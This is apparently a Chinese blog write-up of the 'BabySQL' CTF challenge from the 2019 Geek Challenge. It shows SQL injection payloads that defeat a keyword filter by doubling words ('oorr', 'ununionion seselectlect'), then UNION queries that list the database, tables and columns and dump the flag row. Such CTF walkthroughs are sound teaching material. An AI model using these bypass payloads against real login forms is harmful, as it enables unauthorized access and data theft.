[极客大挑战 2019]BabySQL
判断类型
SQL关键字绕过,这道题可以双写绕过。
username=1' or 1=1#
password=1' or 1=1#
得到报错:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1 #' and password='1' 1=1#'' at line 1
看得出来,password='1' 1=1#''1
中间的or被过滤了
试试双写:
username=1' oorr 1=1#
password=1' oorr 1=1#
得到结果:
Hello admin!
Your password is '4c7aa7ae3b8837418b03e1c98844e89a'
获得数据库相关信息,获得flag
查看回显点个数:
username=1' oorrder bbyy 4#
报错:Unknown column '4' in 'order clause'
username=1' oorrder bbyy 3#
回显正常,说明回显点个数为3
测试回显点位置:
username=1' ununionion seselectlect 1,2,3#
回显:
Hello 2!
Your password is '3'
知道回显点之后,就可以开始套数据了
1' ununionion seselectlect 1,database(),3 #
数据库名为geek
1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
得到表名为b4bsql geekuser
1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser'#
列名都是id,username,password
标签:username,极客,group,name,BabySQL,2019,password,seselectlect,ununionion From: https://www.cnblogs.com/bolerat/p/183165691' ununionion seselectlect 1,group_concat(id,username,passwoorrd),3 frfromom b4bsql#
flag在其中